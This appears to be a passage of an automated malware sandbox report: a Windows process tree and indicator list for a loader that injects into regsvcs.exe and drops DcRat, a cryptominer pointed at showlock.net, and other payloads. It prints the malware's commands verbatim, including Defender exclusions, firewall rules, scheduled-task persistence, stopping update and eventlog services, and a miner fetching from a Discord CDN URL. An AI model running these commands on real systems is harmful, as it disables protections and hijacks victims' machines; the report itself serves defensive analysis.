2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4752 BroomSetup.exe 4688 mmc.exe 4688 mmc.exe 3300 Process not Found 3300 Process not Found 5488 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2904 wrote to memory of 5084 2904 file.exe 97 PID 2904 wrote to memory of 5084 2904 file.exe 97 PID 2904 wrote to memory of 5084 2904 file.exe 97 PID 2904 wrote to memory of 1600 2904 file.exe 98 PID 2904 wrote to memory of 1600 2904 file.exe 98 PID 2904 wrote to memory of 1600 2904 file.exe 98 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5724 5652 file.exe 123 PID 5652 wrote to memory of 5736 5652 file.exe 124 PID 5652 wrote to memory of 5736 5652 file.exe 124 PID 5652 wrote to memory of 5736 5652 file.exe 124 PID 5724 wrote to memory of 6140 5724 regsvcs.exe 127 PID 5724 wrote to memory of 6140 5724 regsvcs.exe 127 PID 5724 wrote to memory of 6140 5724 regsvcs.exe 127 PID 5724 wrote to memory of 5168 5724 regsvcs.exe 129 PID 5724 wrote to memory of 5168 5724 regsvcs.exe 129 PID 5724 wrote to memory of 5168 5724 regsvcs.exe 129 PID 5724 wrote to memory of 5132 5724 regsvcs.exe 128 PID 5724 wrote to memory of 5132 5724 regsvcs.exe 128 PID 5724 wrote to memory of 5132 5724 regsvcs.exe 128 PID 5724 wrote to memory of 392 5724 regsvcs.exe 130 PID 5724 wrote to memory of 392 5724 regsvcs.exe 130 PID 5724 wrote to memory of 392 5724 regsvcs.exe 130 PID 6140 wrote to memory of 1052 6140 jVcQfTbmL2u1ousPu7tmRClP.exe 131 PID 6140 wrote to memory of 1052 6140 jVcQfTbmL2u1ousPu7tmRClP.exe 131 PID 6140 wrote to memory of 1052 6140 jVcQfTbmL2u1ousPu7tmRClP.exe 131 PID 392 wrote to memory of 5388 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 133 PID 392 wrote to memory of 5388 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 133 PID 392 wrote to memory of 5388 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 133 PID 1052 wrote to memory of 5480 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 171 PID 1052 wrote to memory of 5480 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 171 PID 1052 wrote to memory of 5480 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 171 PID 1052 wrote to memory of 1592 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 135 PID 1052 wrote to memory of 1592 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 135 PID 1052 wrote to memory of 1592 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 135 PID 392 wrote to memory of 4752 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 136 PID 392 wrote to memory of 4752 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 136 PID 392 wrote to memory of 4752 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 136 PID 4752 wrote to memory of 1660 4752 BroomSetup.exe 138 PID 4752 wrote to memory of 1660 4752 BroomSetup.exe 138 PID 4752 wrote to memory of 1660 4752 BroomSetup.exe 138 PID 1660 wrote to memory of 3720 1660 cmd.exe 151 PID 1660 wrote to memory of 3720 1660 cmd.exe 151 PID 1660 wrote to memory of 3720 1660 cmd.exe 151 PID 1660 wrote to memory of 3148 1660 cmd.exe 141 PID 1660 wrote to memory of 3148 1660 cmd.exe 141 PID 1660 wrote to memory of 3148 1660 cmd.exe 141 PID 5132 wrote to memory of 5148 5132 GNL8HPgpc3h1ughp9OmayOAG.exe 144 PID 5132 wrote to memory of 5148 5132 GNL8HPgpc3h1ughp9OmayOAG.exe 144 PID 5132 wrote to memory of 5148 5132 GNL8HPgpc3h1ughp9OmayOAG.exe 144 PID 5724 wrote to memory of 5344 5724 regsvcs.exe 146 PID 5724 wrote to memory of 5344 5724 regsvcs.exe 146 PID 5724 wrote to memory of 5344 5724 regsvcs.exe 146 PID 5344 wrote to memory of 512 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 147 PID 5344 wrote to memory of 512 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 147 PID 5344 wrote to memory of 512 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 147 PID 5344 wrote to memory of 1752 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 182 PID 5344 wrote to memory of 1752 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 182 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵PID:5084
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵PID:1600
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- DcRat
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2428
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4120 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:81⤵PID:456
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵
- DcRat
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5724 -
C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:6140 -
C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp"C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp" /SL5="$203F8,1697450,56832,C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i5⤵
- Executes dropped EXE
PID:5480
-
-
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s5⤵
- Executes dropped EXE
PID:1592
-
-
-
-
C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5148
-
-
C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5300
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2136
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:1108
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2592
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3328
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:5536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6076
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:4508
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2892
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5904
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1892
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5388 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:6124
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:1864
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:806⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:443 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:80 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --nicehash --http-port 3433 --http-access-token f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --randomx-wrmsr=-17⤵PID:1820
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 18207⤵PID:1192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:5240
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1840
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:336
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe6⤵PID:5356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe6⤵PID:2740
-
-
-
-
-
C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe"C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5168
-
-
C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe"C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 33205⤵
- Program crash
PID:5220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:3720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:3148
-
-
-
-
-
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe"C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:5344 -
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exeC:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6e7f21c8,0x6e7f21d4,0x6e7f21e04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:512
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1752
-
-
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe"C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5344 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240310162828" --session-guid=212f66a5-7f1b-448e-b906-6cdefc4c9881 --server-tracking-blob=MjUwNDNlOGVhNjM1NmY4OTkyNzdjZTEwNGEwODhmZGRjODEwMDM2ODY5YjI5ZmU1OGFkZTRiZjVhNTE5MTI0NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDA4ODA5MC44NTUyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyNWVhMmQwNS1kODE4LTRkZmEtYmQ0MC0yZjVlNjkyYmI4ZGYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A4050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:912 -
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exeC:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x308,0x30c,0x310,0x2d8,0x314,0x6dce21c8,0x6dce21d4,0x6dce21e05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3720
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:4332
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5208 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x288,0x28c,0x290,0x260,0x294,0x1000040,0x100004c,0x10000585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5048
-
-
-
-
C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe"C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:5576 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5156
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:3712
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1604
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:6124 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5480
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3268
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:5140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1752
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:4120
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:5648
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:4084
-
-
-
C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"3⤵
- Executes dropped EXE
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp"C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp" /SL5="$1403A2,1697450,56832,C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4464 -
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i5⤵
- Executes dropped EXE
PID:4764
-
-
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s5⤵
- Executes dropped EXE
PID:2516
-
-
-
-
C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe"C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
PID:2064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 10205⤵
- Program crash
PID:5232
-
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5488 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:5992
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:3560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:652
-
-
-
-
-
C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"3⤵
- Executes dropped EXE
PID:5000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3060
-
-
C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"4⤵
- Executes dropped EXE
PID:1996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Modifies data under HKEY_USERS
PID:1168
-
-
-
-
C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe"C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3148
-
-
C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe"C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:3052 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵PID:5384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5428
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:3496
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:4736
-
-
